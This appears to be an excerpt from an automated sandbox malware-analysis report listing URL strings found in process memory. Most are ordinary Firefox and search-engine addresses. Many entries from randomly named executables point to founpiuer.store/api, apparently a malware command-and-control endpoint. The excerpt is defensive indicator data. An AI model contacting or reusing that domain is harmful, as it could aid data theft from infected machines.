Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: 0d287ea527.exe, 00000009.00000003.2600774407.00000000051B1000.00000004.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3014279313.0000000023871000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2773180245.00000000058B9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2771042618.0000000002B6A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: c4df60870c.exe, 0000000A.00000002.3014279313.0000000023871000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2789702057.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2855995666.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2815618806.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2831854359.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2814519497.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2865305089.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2920445413.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: firefox.exe, 0000001A.00000002.2877364701.0000028C9B581000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1539075
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1584464
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1607439
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=1616739
Source: 0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2713884695.0000028C9AE1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: 0d287ea527.exe, 00000009.00000003.2600774407.00000000051B1000.00000004.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.3014279313.0000000023871000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2773180245.00000000058B9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2771042618.0000000002B6A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: c4df60870c.exe, 0000000A.00000002.3014279313.0000000023871000.00000004.00000020.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2789702057.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2855995666.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2815618806.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2831854359.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2814519497.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2865305089.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2920445413.0000000002B69000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 0000001A.00000002.2918738618.0000028CA3052000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com
Source: firefox.exe, 0000001A.00000002.2918738618.0000028CA3052000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2918738618.0000028CA30A3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 0000001A.00000002.2842783233.0000028C8B011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2797063483.0000028CA3173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crbug.com/993268
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTabMozRequestFullSc
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarning
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#EncryptionPreventDefaultFromP
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingDocumentWriteIgnored
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/ElementCSSInlineStyle/style#setting_styles)
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Statements/for-await...of
Source: firefox.exe, 0000001A.00000003.2799161819.0000028CA3172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2797063483.0000028CA3173000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/Web_Components/Using_custom_elements#using_the_lifecycl
Source: freecam.exe, 00000007.00000002.2669978281.0000000000968000.00000002.00000001.01000000.00000009.sdmp	String found in binary or memory: https://developers.google.com/protocol-buffers/docs/reference/go/faq#namespace-conflict
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: c4df60870c.exe, 0000000A.00000002.3027918391.000000006C331000.00000002.00000001.01000000.0000000F.sdmp, c4df60870c.exe, 0000000A.00000002.2959179677.000000000019C000.00000040.00000001.01000000.0000000B.sdmp, c4df60870c.exe, 0000000A.00000003.2593195591.000000000504B000.00000004.00001000.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.3009795349.000000000618C000.00000040.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 0000001A.00000003.2714052213.0000028C9AE3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2860413148.0000028C988E0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2933591900.0000153EAE504000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2713884695.0000028C9AE1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2715980139.0000028C9AE5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: 0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 0d287ea527.exe, 00000009.00000003.2565798441.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565425414.00000000051DF000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2565653231.00000000051CA000.00000004.00000800.00020000.00000000.sdmp, c4df60870c.exe, 0000000A.00000002.2974865414.0000000001181000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2722580253.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723873605.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2723631868.0000000004FBB000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000015.00000003.2724193570.0000000004FB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001A.00000002.2867787047.0000028C9AA2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2719539849.0000028C9AA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%shttp://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001A.00000002.2863474387.0000028C992A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001A.00000002.2867787047.0000028C9AA2C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000003.2719539849.0000028C9AA33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2863474387.0000028C992C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%sPdfJs.init
Source: firefox.exe, 0000001A.00000002.2883449828.0000028C9CC21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
Source: firefox.exe, 0000001A.00000002.2884703213.0000028C9CD4B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001A.00000002.2847623148.0000028C96D80000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C97326000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C9737C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001A.00000002.2849549835.0000028C973E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: 0d287ea527.exe, 00000012.00000003.2804158354.0000000001167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/
Source: 0d287ea527.exe, 00000012.00000003.2767455140.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2789081967.00000000058BA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2765974723.00000000058B4000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2789702057.00000000058BA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2770885038.00000000058B9000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2773180245.00000000058B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/$
Source: 0d287ea527.exe, 00000009.00000003.2544718457.00000000006EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store//
Source: 0d287ea527.exe, 00000009.00000003.2593495254.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/00000
Source: 0d287ea527.exe, 00000009.00000003.2579854082.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/211211
Source: 0d287ea527.exe, 00000012.00000003.2789081967.00000000058BA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.3006911886.00000000058BB000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2789702057.00000000058BA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2860952759.00000000058BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/G
Source: 0d287ea527.exe, 00000012.00000003.2804451550.0000000001167000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2790172223.0000000001166000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2804158354.0000000001167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/M
Source: 0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/SK
Source: 0d287ea527.exe, 00000009.00000003.2638093147.0000000000768000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2748036577.00000000058BE000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2804451550.0000000001167000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2746248354.00000000058BE000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2749557795.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2765974723.00000000058B4000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2790172223.0000000001166000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000002.2978043891.0000000001173000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2804158354.0000000001167000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api
Source: 0d287ea527.exe, 00000009.00000003.2637956627.0000000000782000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2637745818.000000000077E000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2706223388.0000000000782000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2827259802.0000000000782000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api79MP
Source: 0d287ea527.exe, 00000009.00000003.2593495254.0000000000768000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2852947773.0000000000760000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2579854082.0000000000768000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2638093147.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api;f
Source: 0d287ea527.exe, 00000009.00000003.2579854082.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api;g
Source: 0d287ea527.exe, 00000009.00000003.2593495254.0000000000768000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2579854082.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apiCgd-
Source: 0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apiWJ
Source: 0d287ea527.exe, 00000012.00000003.2789081967.00000000058BA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2789702057.00000000058BA000.00000004.00000800.00020000.00000000.sdmp, 0d287ea527.exe, 00000012.00000003.2804329326.00000000058BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apiange
Source: 0d287ea527.exe, 00000009.00000003.2544718457.0000000000706000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apii
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apiuh5-D#
Source: 0d287ea527.exe, 00000009.00000003.2593495254.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/e
Source: 0d287ea527.exe, 00000009.00000003.2638093147.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/es#g
Source: 0d287ea527.exe, 00000012.00000003.2706092169.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/pi
Source: 0d287ea527.exe, 00000012.00000002.2978043891.0000000001106000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/piU
Source: 0d287ea527.exe, 00000009.00000003.2638093147.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/pkg
Source: 0d287ea527.exe, 00000009.00000003.2638093147.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/s
Source: 0d287ea527.exe, 00000009.00000003.2593495254.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/string
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/ts
Source: 0d287ea527.exe, 00000009.00000003.2693717383.0000000000779000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/vK=-H
Source: 0d287ea527.exe, 00000009.00000003.2825831566.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/vo
Source: 0d287ea527.exe, 00000009.00000003.2579854082.0000000000768000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/voqvcgD-
Source: 0d287ea527.exe, 00000009.00000003.2594123989.000000000076D000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2593346442.000000000076D000.00000004.00000020.00020000.00000000.sdmp, 0d287ea527.exe, 00000009.00000003.2618539870.000000000076D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/w$K
Source: 0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store:443/api
Source: 0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store:443/api5Cs
Source: 0d287ea527.exe, 00000012.00000002.2978043891.00000000010E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store:443/apii
